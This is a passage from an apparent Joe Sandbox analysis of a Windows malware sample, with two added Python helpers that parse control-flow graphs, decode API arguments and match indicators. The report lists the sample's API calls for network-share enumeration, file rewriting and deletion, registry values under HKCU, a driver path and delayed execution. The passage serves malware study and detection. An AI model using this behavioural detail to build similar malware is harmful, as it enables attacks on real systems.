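            start, _, end = tokens[i + 1].partition("-")
            current = int(tok)
            nodes[current] = Block(int(start, 16), int(end or start, 16))
            i += 2
            continue
        if current is not None:
            nodes[current].labels.append(tok)
        i += 1
    return nodes, edges


def successors(edges: List[Tuple[int, int]]) -> Dict[int, Set[int]]:
    succ: Dict[int, Set[int]] = defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
    return succ


def entry_block(nodes: Dict[int, Block]) -> int:
    """The block with the lowest start address is the function entry."""
    return min(nodes, key=lambda n: nodes[n].start)


def reachable(edges: List[Tuple[int, int]], entry: int) -> Set[int]:
    succ, seen, todo = successors(edges), set(), deque([entry])
    while todo:
        n = todo.popleft()
        if n not in seen:
            seen.add(n)
            todo.extend(succ[n])
    return seen


def exit_blocks(nodes: Dict[int, Block], edges: List[Tuple[int, int]]) -> Set[int]:
    succ = successors(edges)
    return {n for n in nodes if not succ[n]}


def blocks_calling(nodes: Dict[int, Block], name: str) -> List[int]:
    return sorted(n for n, b in nodes.items() if name in b.calls())


def self_recursive_blocks(nodes: Dict[int, Block]) -> List[int]:
    """Blocks whose call target is the function's own entry address."""
    target = f"call {nodes[entry_block(nodes)].start:x}"
    return blocks_calling(nodes, target)


def summarize(dump: str) -> Dict[str, object]:
    nodes, edges = parse_cfg_dump(dump)
    entry = entry_block(nodes)
    return {
        "blocks": len(nodes), "edges": len(edges), "entry": entry,
        "unreachable": sorted(set(nodes) - reachable(edges, entry)),
        "exits": sorted(exit_blocks(nodes, edges)),
        "recursion": self_recursive_blocks(nodes),
        "delete_file": blocks_calling(nodes, "DeleteFileA"),
        "sleeps": blocks_calling(nodes, "Sleep"),
    }


if __name__ == "__main__":
    for key, value in summarize(WNET_CFG_DUMP).items():
        print(f"{key}: {value}")
```

On this graph the summary reports block 983 as the only self-recursive block (the "call 129195d" that re-enters the enumerator for each container returned by WNetEnumResourceA), block 998 as the DeleteFileA caller, blocks 963, 976 and 987 as the Sleep sites (initial delay, retry after a failed enumeration, and the pause after each recursive descent), and blocks 966 and 980 as the blocks with no recorded successor. Block counts and the exit set are what you compare against a second sample's dump when deciding whether two functions are the same code.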
Control-flow Graph

control_flow_graph 1031 1289eea-1289ef7 1032 1289ef9-1289f04 Sleep 1031->1032 1033 1289f06-1289f0b Sleep 1031->1033 1034 1289f11-1289f3e call 1288f51 * 2 1032->1034 1033->1034 1038 1289f43-1289f5a LoadLibraryA 1034->1038 1039 128a149-128a168 RtlExitUserThread 1038->1039 1040 1289f60-1289f7c GetProcAddress 1038->1040 1042 1289f7e 1040->1042 1043 1289f83-1289fa0 GetProcAddress 1040->1043 1044 1289fa2 1043->1044 1045 1289fa7-1289fc4 GetProcAddress 1043->1045 1046 1289fcb-1289fe7 GetProcAddress 1045->1046 1047 1289fc6 1045->1047 1048 1289fe9 1046->1048 1049 1289fee-128a00b GetProcAddress 1046->1049 1050 128a00d 1049->1050 1051 128a012-128a02f GetProcAddress 1049->1051 1052 128a031 1051->1052 1053 128a036-128a052 GetProcAddress 1051->1053 1054 128a059-128a076 GetProcAddress 1053->1054 1055 128a054 1053->1055 1056 128a078-128a155 1054->1056 1057 128a07d-128a0ba call 12892f3 CreateThread call 12841c6 LoadLibraryA 1054->1057 1056->1039 1057->1039 1063 128a0c0-128a0dc GetProcAddress 1057->1063 1063->1039 1064 128a0de-128a0e5 call 128917d 1063->1064 1067 128a113-128a11a call 128917d 1064->1067 1068 128a0e7-128a110 call 12845d2 call 1289243 1064->1068 1067->1039 1074 128a11c-128a123 call 1289706 1067->1074 1068->1067 1074->1039 1078 128a125-128a146 CreateThread call 12841c6 1074->1078 1078->1039
APIs
• Sleep.KERNEL32(0001D4C0), ref: 01289EFE
• Sleep.KERNEL32(00001000), ref: 01289F0B
• LoadLibraryA.KERNEL32(012827C0), ref: 01289F4D
• GetProcAddress.KERNEL32(00000000,012827D0), ref: 01289F6A
• GetProcAddress.KERNEL32(00000000,012827E0), ref: 01289F8E
• GetProcAddress.KERNEL32(00000000,012827F0), ref: 01289FB2
• RtlExitUserThread.NTDLL(00000000), ref: 0128A14B
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
• String ID: C:\Windows\system32\drivers\npjnsn.sys
• API String ID: 3711489173-2135717084
• Opcode ID: 67606a014b9f55d25fb011c9c1e3f7cdc74084b9c5d147b743bff2621eb4582f
• Instruction ID: 103b3e90a08db92dedfd35f80c5dde4e97339b401620604193d745519954ac87
• Opcode Fuzzy Hash: 67606a014b9f55d25fb011c9c1e3f7cdc74084b9c5d147b743bff2621eb4582f
• Instruction Fuzzy Hash: 6E61C274A21204EFEF20FFA8F84DB6937B8AB98355F00851AEA05932D8DB716594CF10
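The "APIs" lists printed for the functions above show arguments as raw DWORDs, so the interesting facts (RegOpenKeyExA on 80000001 with 000F003F is HKEY_CURRENT_USER with KEY_ALL_ACCESS, WNetOpenEnumA with scope 00000002 is RESOURCE_GLOBALNET, Sleep 0001D4C0 is a two-minute delay before the driver-loading thread does anything) take a table lookup each time. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses entries in the format printed on this page, decodes the Win32 constants, and flags strings from this report that a host check would look for. The sample entries are copied from the lists above (constructed input, not a full trace); the IOC list is taken from the String ID fields on this page, and whether Ap1mutx7 and purity_control_7728 are mutex names is inferred from the Mutex APIs listed beside them, not confirmed by the report.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: entries copied from the "APIs" lists of the functions
# at 1284d96, 129195d and 1289eea above. Not a complete trace of the sample.
SAMPLE_API_LINES = [
    "lstrcpy.KERNEL32(00000000,Software\\Erlloywmr), ref: 01284E54",
    "wsprintfA.USER32 ref: 01284E86",
    "RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01284EA9",
    "RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01284ECA",
    "Sleep.KERNEL32(00000400), ref: 012919FA",
    "WNetOpenEnumA.MPR(00000002,00000000,00000000,01299078,?), ref: 01291A11",
    "GlobalAlloc.KERNEL32(00000040,00007F80), ref: 01291A51",
    "lstrcat.KERNEL32(?,.tmp), ref: 01291BD1",
    "Sleep.KERNEL32(0001D4C0), ref: 01289EFE",
    "Sleep.KERNEL32(00001000), ref: 01289F0B",
    "LoadLibraryA.KERNEL32(012827C0), ref: 01289F4D",
    "RtlExitUserThread.NTDLL(00000000), ref: 0128A14B",
]

# Well-known Win32 constants used to decode raw DWORD arguments.
REG_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ALL_ACCESS = 0x000F003F
WNET_SCOPES = {1: "RESOURCE_CONNECTED", 2: "RESOURCE_GLOBALNET", 3: "RESOURCE_REMEMBERED"}
GMEM_ZEROINIT = 0x40

# Strings from this report's String ID fields; the two mutex-looking names are an
# inference from the neighbouring Mutex APIs, not something the report states.
IOC_SUBSTRINGS = ["Software\\Erlloywmr", "npjnsn.sys", "Ap1mutx7", "purity_control_7728"]

# "<api>.<module>(<args>), ref: <addr>"; the parenthesised argument list is absent
# for some entries (wsprintfA above), so it is optional.
API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


def parse_api_line(line: str) -> Optional[Dict[str, object]]:
    m = API_RE.match(line.strip())
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def as_dword(arg: str) -> Optional[int]:
    """Integer value of an 8-hex-digit argument; None for '?' and string arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_entry(entry: Dict[str, object]) -> str:
    api, args = entry["api"], entry["args"]
    vals = [as_dword(a) for a in args]
    if api == "Sleep" and vals and vals[0] is not None:
        return f"Sleep {vals[0]} ms ({vals[0] / 1000:.1f} s)"
    if api in ("RegOpenKeyExA", "RegCreateKeyA") and vals and vals[0] in REG_ROOTS:
        text = f"{api} under {REG_ROOTS[vals[0]]}"
        if api == "RegOpenKeyExA" and len(vals) > 3 and vals[3] == KEY_ALL_ACCESS:
            text += " (KEY_ALL_ACCESS)"
        return text
    if api == "WNetOpenEnumA" and vals and vals[0] in WNET_SCOPES:
        return f"WNetOpenEnumA scope={WNET_SCOPES[vals[0]]}: walks the network neighbourhood"
    if api == "GlobalAlloc" and len(vals) > 1 and vals[1] is not None:
        zeroed = vals[0] is not None and bool(vals[0] & GMEM_ZEROINIT)
        return f"GlobalAlloc {vals[1]} bytes ({'GMEM_ZEROINIT' if zeroed else 'no GMEM_ZEROINIT'})"
    return api


def triage(lines: List[str]) -> Dict[str, object]:
    """Decode every entry, collect IOC string hits by call site, and report the
    longest Sleep (a long initial delay is a common sandbox-evasion tell)."""
    decoded, ioc_hits, sleeps = [], {}, []
    for line in lines:
        entry = parse_api_line(line)
        if entry is None:
            continue
        decoded.append((entry["ref"], decode_entry(entry)))
        if entry["api"] == "Sleep" and entry["args"]:
            ms = as_dword(entry["args"][0])
            if ms is not None:
                sleeps.append(ms)
        for ioc in IOC_SUBSTRINGS:
            if any(ioc.lower() in a.lower() for a in entry["args"]):
                ioc_hits.setdefault(ioc, []).append(entry["ref"])
    return {"decoded": decoded, "ioc_hits": ioc_hits, "max_sleep_ms": max(sleeps, default=0)}


if __name__ == "__main__":
    result = triage(SAMPLE_API_LINES)
    for ref, text in result["decoded"]:
        print(f"{ref:08X}  {text}")
    print("IOC hits:", result["ioc_hits"])
    print("longest sleep (ms):", result["max_sleep_ms"])
```

Run as a script it prints one decoded line per entry; the two-minute Sleep (0001D4C0 = 120000 ms) and the 32640-byte zero-initialised enumeration buffer come out as numbers rather than hex, and the only IOC hit in this sample set is Software\Erlloywmr at 01284E54. Extending the IOC list with the driver path and the two mutex-like names catches the matching entries when the full trace is fed in.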

Control-flow Graph

control_flow_graph 1118 1284af0-1284b59 call 1298060 1121 1284b5b 1118->1121 1122 1284b60-1284bc9 lstrcpy lstrlen wsprintfA RegOpenKeyExA 1118->1122 1123 1284d75-1284d79 1121->1123 1124 1284bcb-1284be6 RegCreateKeyA 1122->1124 1125 1284bed-1284c0f 1122->1125 1124->1125 1127 1284be8 1124->1127 1128 1284d68-1284d6f RegCloseKey 1125->1128 1129 1284c15-1284c5a wsprintfA 1125->1129 1127->1123 1128->1123 1130 1284d0a-1284d11 1129->1130 1131 1284c60-1284c66 1129->1131 1139 1284d13-1284d34 RegSetValueExA 1130->1139 1140 1284d36-1284d5d lstrlen RegSetValueExA 1130->1140 1132 1284cbc-1284ce3 call 1284a5b lstrcpy 1131->1132 1133 1284c6d-1284c78 1131->1133 1134 1284c7d-1284c8b 1131->1134 1135 1284c8d-1284c9b 1131->1135 1136 1284c9d-1284cac 1131->1136 1137 1284cae-1284cba 1131->1137 1138 1284ce5-1284d04 call 1284a5b lstrcpy 1131->1138 1132->1130 1133->1130 1134->1130 1135->1130 1136->1130 1137->1130 1138->1130 1141 1284d63 1139->1141 1140->1141
APIs
• lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 01284B6C
• lstrlen.KERNEL32(00000000,\%d,6E6F7266), ref: 01284B90
• wsprintfA.USER32 ref: 01284B9E
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01284BC1
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01284BDE
Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Software\Erlloywmr$\%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 4004410694-3772162829
                                                                                                                                                                                                                                    • Opcode ID: ae48966316fe4b2b8bece7b310e6a39c356103d5e1d72e1c8ff93b02caa78b31
                                                                                                                                                                                                                                    • Instruction ID: ee1d4ec600be8a0bed0e13b2d6cb6cef6c8769d1935642990f7d0d91b94d12fb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae48966316fe4b2b8bece7b310e6a39c356103d5e1d72e1c8ff93b02caa78b31
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE617F75914259EFCB28EF54DC5ABE9B778EB58701F0081D8E709A7284D7B0AAC4CF90

Control-flow Graph
control_flow_graph 1146 12914d9-129152d CreateFileA 1147 129152f-1291531 1146->1147 1148 1291536-1291582 GlobalAlloc ReadFile lstrlen call 1284527 1146->1148 1149 1291746-1291749 1147->1149 1151 1291587-1291597 1148->1151 1152 129159d-12915c9 lstrlen call 12847bb 1151->1152 1153 1291730-1291734 1151->1153 1152->1153 1158 12915cf-12915d9 1152->1158 1154 1291740 1153->1154 1155 1291736-129173a GlobalFree 1153->1155 1154->1149 1155->1154 1159 12915ed-12915fc 1158->1159 1160 12915fe-129163f lstrlen call 12842ec call 12843c5 1159->1160 1161 1291641-12916b6 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 1159->1161 1160->1159 1163 12916b8-12916c2 1161->1163 1164 12916c4-12916c8 1161->1164 1163->1164 1166 12916e5-129172a call 1284631 Sleep CreateThread call 12841c6 Sleep 1163->1166 1167 12916ca-12916ce GlobalFree 1164->1167 1168 12916d4-12916e3 DeleteFileA 1164->1168 1166->1153 1167->1168 1168->1149

APIs
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0129151A
• GlobalAlloc.KERNEL32(00000040,?), ref: 01291542
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01291563
• lstrlen.KERNEL32(012621A4), ref: 0129156E
• lstrlen.KERNEL32(012621A4), ref: 012915A2
• lstrlen.KERNEL32(01282654,?), ref: 0129160C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0129164E
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01291672
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0129168D
• SetEndOfFile.KERNEL32(?), ref: 0129169A
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
• String ID:
• API String ID: 3635920088-0
• Opcode ID: f70ded06fb1eac843c979dd74e2de500aa43f55b51188d728792ed4056afdad0
• Instruction ID: 8c5955a4fb9293b033eedc3f6fbf1ecfd39978e34fccb0d9033a8752ca37370b
• Opcode Fuzzy Hash: f70ded06fb1eac843c979dd74e2de500aa43f55b51188d728792ed4056afdad0
• Instruction Fuzzy Hash: 3D613175A10219EFDB24DBA8DD4AFDD7779AB48701F108184F709A72C4D7B4AA90CF90

Control-flow Graph
control_flow_graph 1176 1286330-12863d7 call 1298060 RtlEnterCriticalSection 1179 128672a-128672e 1176->1179 1180 12863dd-1286410 call 129772b 1176->1180 1181 128695b-1286980 RtlLeaveCriticalSection 1179->1181 1182 1286734-1286749 IsBadWritePtr 1179->1182 1188 1286412 1180->1188 1189 1286417-128645f 1180->1189 1182->1181 1185 128674f-1286758 1182->1185 1185->1181 1187 128675e-1286767 1185->1187 1187->1181 1190 128676d-1286788 call 1284145 1187->1190 1191 1286461 1189->1191 1192 1286466-1286494 call 129772b 1189->1192 1190->1181 1199 128678e-12867f8 wsprintfA lstrlen call 12842ec call 12843c5 1190->1199 1197 1286496-12864a5 1192->1197 1198 12864c7 1192->1198 1197->1198 1200 12864a7-12864b4 1197->1200 1199->1181 1211 12867fe-128680d 1199->1211 1200->1198 1202 12864b6-12864c5 1200->1202 1202->1198 1204 12864cc-12864db 1202->1204 1206 12864dd 1204->1206 1207 12864e2-12864ef 1204->1207 1209 12864f1-1286500 1207->1209 1210 1286507-12865a6 call 129772b * 4 call 12847bb 1207->1210 1209->1210 1212 1286502 1209->1212 1235 12865a8 1210->1235 1236 12865ad-12865b7 1210->1236 1211->1181 1213 1286813-128681d 1211->1213 1213->1181 1215 1286823-128684a call 12847bb 1213->1215 1215->1181 1221 1286850-1286866 1215->1221 1223 1286868-128686f GlobalFree 1221->1223 1224 1286875-12868b1 GlobalAlloc call 129772b 1221->1224 1223->1224 1230 12868bf-1286958 GlobalAlloc wsprintfA lstrlen call 12842ec call 12843c5 call 129772b call 12854a2 1224->1230 1231 12868b3-12868b9 GlobalFree 1224->1231 1230->1181 1231->1230 1238 12865c8-12865da 1236->1238 1241 1286698-128669f 1238->1241 1242 12865e0-12865ec 1238->1242 1243 12866a1-128696e 1241->1243 1244 12866a6-128671d call 129772b * 2 call 1284af0 1241->1244 1246 12865fd-128660e 1242->1246 1243->1181 1266 1286722-1286725 1244->1266 1250 1286610-128661f 1246->1250 1251 1286623-1286657 lstrcpy 1246->1251 1250->1251 1256 1286621 1250->1256 1252 1286659-1286663 1251->1252 1253 1286687-1286693 1251->1253 1252->1253 1258 1286665-128666f 1252->1258 1253->1238 1256->1246 1258->1253 1262 1286671-128667b 1258->1262 1262->1253 1264 128667d 1262->1264 1264->1253 1266->1181

APIs
• RtlEnterCriticalSection.NTDLL(01299050), ref: 012863CD
• IsBadWritePtr.KERNEL32(00000000,-00000008), ref: 01286741
• wsprintfA.USER32 ref: 012867A0
• lstrlen.KERNEL32(?,?), ref: 012867B7
• GlobalFree.KERNEL32(00000000), ref: 0128686F
• GlobalAlloc.KERNEL32(00000040,?), ref: 01286883
• RtlLeaveCriticalSection.NTDLL(01299050), ref: 01286960
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
• String ID: purity_control_%x$purity_control_%x
• API String ID: 2588801185-2962537068
• Opcode ID: b3695a4ec1b8c7fc586f287016dceb027ad1054474d8d4358f6068e84b907ca3
• Instruction ID: ae52bcf88abb74b4be2a8841723603d1aeca6c76b6072f9fb652c75048cfe32c
• Opcode Fuzzy Hash: b3695a4ec1b8c7fc586f287016dceb027ad1054474d8d4358f6068e84b907ca3
• Instruction Fuzzy Hash: C002D371911219DFCB25DF18DC90FEA77B6BF94304F0481E8EA499B285D772AA90CF90

Control-flow Graph
control_flow_graph 1267 1285760-12857e1 1268 12857ec 1267->1268 1269 12857e3-12857ea 1267->1269 1271 1285c01-1285c05 1268->1271 1269->1268 1270 12857f1-1285825 lstrcpy RegOpenKeyExA 1269->1270 1272 1285854-1285858 1270->1272 1273 1285827-128582b 1270->1273 1276 1285a4b-1285a89 1272->1276 1277 128585e-1285868 1272->1277 1274 128582d 1273->1274 1275 1285832-128584d RegCreateKeyA 1273->1275 1274->1271 1275->1272 1279 128584f 1275->1279 1281 1285beb-1285bf2 1276->1281 1282 1285a8f-1285a99 1276->1282 1280 1285872-128589e RegEnumValueA 1277->1280 1279->1271 1283 12858a0-12858a9 1280->1283 1284 12858d4-128590b 1280->1284 1281->1271 1285 1285bf4-1285bfb RegCloseKey 1281->1285 1282->1281 1286 1285a9f-1285aca 1282->1286 1287 12858ab 1283->1287 1288 12858ad-12858d2 RegDeleteValueA 1283->1288 1291 1285911-1285923 1284->1291 1292 1285a46 1284->1292 1285->1271 1295 1285bd9-1285bdf 1286->1295 1296 1285ad0-1285b35 wsprintfA RegQueryValueExA 1286->1296 1287->1284 1288->1280 1293 1285935 1291->1293 1294 1285925-1285933 1291->1294 1292->1281 1293->1292 1294->1293 1297 128593a-1285944 1294->1297 1295->1281 1298 1285b46-1285b82 1296->1298 1299 1285b37-1285b41 1296->1299 1300 1285955-128595c 1297->1300 1301 1285bd4 1298->1301 1302 1285b84-1285b8a 1298->1302 1299->1295 1303 1285a41 1300->1303 1304 1285962-12859ae wsprintfA 1300->1304 1301->1295 1305 1285b91-1285b9f 1302->1305 1306 1285ba1-1285bb2 1302->1306 1307 1285bb4-1285bc3 1302->1307 1308 1285bc5-1285bd1 1302->1308 1303->1292 1309 12859b0-12859b6 1304->1309 1310 1285a01-1285a3c RegSetValueExA 1304->1310 1305->1301 1306->1301 1307->1301 1308->1301 1309->1305 1309->1306 1309->1307 1309->1308 1311 12859bd-12859cb 1309->1311 1312 12859cd-12859df 1309->1312 1313 12859e1-12859f0 1309->1313 1314 12859f2-12859fb 1309->1314 1315 1285946-128594f 1310->1315 1311->1310 1312->1310 1313->1310 1314->1310 1315->1300

APIs
• lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 012857FD
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0128581D
• RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 01285845
• RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01285896
• RegCloseKey.KERNEL32(00000000), ref: 01285BFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateEnumOpenValuelstrcpy
                                                                                                                                                                                                                                    • String ID: %c%d_%d$%c%d_%d$Software\Erlloywmr$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 4133318789-255879431
                                                                                                                                                                                                                                    • Opcode ID: 40215fcc4e2f6ac244779f903c0f7a73f6618e847fdfff03108a5a37570234a4
                                                                                                                                                                                                                                    • Instruction ID: 8023c3e36041d8c2214b75da696ee8de01f76b19db3a973d9837a04733cc6ef1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40215fcc4e2f6ac244779f903c0f7a73f6618e847fdfff03108a5a37570234a4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC14874921228EBDF24DF54EC88BE9B7B5BB58314F1082C9D509A7290D7B4ABC4CF90
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00008002), ref: 0129457F
                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000002,?), ref: 0129458E
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299030), ref: 01294599
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299018), ref: 012945A4
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299050), ref: 012945AF
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: LoadLibraryA.KERNEL32(01282154), ref: 01293C13
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,0128278C), ref: 01293C36
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012827A0), ref: 01293C4E
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012827B0), ref: 01293C67
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: LoadLibraryA.KERNEL32(01282894), ref: 01293C79
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828D8), ref: 01293C9C
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828B0), ref: 01293CB5
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828C4), ref: 01293CCD
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828A0), ref: 01293CE6
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 012945D2
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 012945F9
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: CloseHandle.KERNEL32(00000000), ref: 01284247
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 01294620
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 01294647
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0129466E
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 01294695
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 012946BC
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 012946E3
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0129470A
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000200), ref: 01294727
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
